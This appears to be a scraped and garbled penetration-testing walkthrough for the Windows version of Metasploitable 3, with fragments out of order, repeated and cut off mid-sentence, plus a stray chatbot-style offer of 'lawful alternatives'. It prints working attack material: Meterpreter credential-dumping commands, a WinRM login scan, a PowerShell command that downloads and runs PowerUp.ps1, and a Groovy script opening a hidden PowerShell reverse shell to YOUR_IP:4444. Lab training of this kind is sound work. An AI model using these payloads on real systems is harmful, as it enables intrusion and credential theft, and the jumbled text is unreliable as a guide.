Metasploitable 3 often runs a GlassFish server. This is a common entry point.
Set up listener on Kali:
meterpreter > creds_msv meterpreter > creds_kerberos meterpreter > creds_wdigest
Then choose a module like exploit/windows/local/ms16_032_secondary_logon_handle . metasploitable 3 windows walkthrough
msf6 > use auxiliary/scanner/winrm/winrm_login msf6 auxiliary(scanner/winrm/winrm_login) > set RHOSTS [target_ip] msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME vagrant msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD vagrant msf6 auxiliary(scanner/winrm/winrm_login) > run
allow for similar RCE vectors, highlighting the danger of unpatched middleware in a Windows environment. Phase III: Post-Exploitation and Lateral Movement Once a shell is established, the focus shifts to Enumeration . In Windows, this involves identifying: User Context: whoami /priv to see enabled privileges like SeImpersonatePrivilege Network Connections: netstat -ano to find internal services not exposed to the outside. Stored Credentials: Searching for unattend.xml files or credentials stored in registry keys. Metasploitable 3 intentionally includes the ManageEngine Desktop Central
:
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http:// /PowerUp.ps1'); Invoke-AllChecks" Use code with caution. Exploiting AlwaysInstallElevated
While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld. Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators. Conclusion: Lessons in Modern Vulnerability
If you’re learning penetration testing legally, I can help with safe, lawful alternatives such as: Metasploitable 3 often runs a GlassFish server
This walkthrough for the Windows version of Metasploitable 3
def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'cmd.exe /c powershell.exe -nop -w hidden -c $client = New-Object System.Net.Sockets.TCPClient("YOUR_IP",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%0;while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0) Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.length);$stream.Flush();$client.Close()'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOr(1000) Use code with caution.
Use the to identify unpatched kernel exploits: Stored Credentials: Searching for unattend
If a path contains spaces without quotes (e.g., C:\Program Files\Vuln App\service.exe ), Windows resolves the first token, allowing an attacker to place a malicious executable earlier in the path.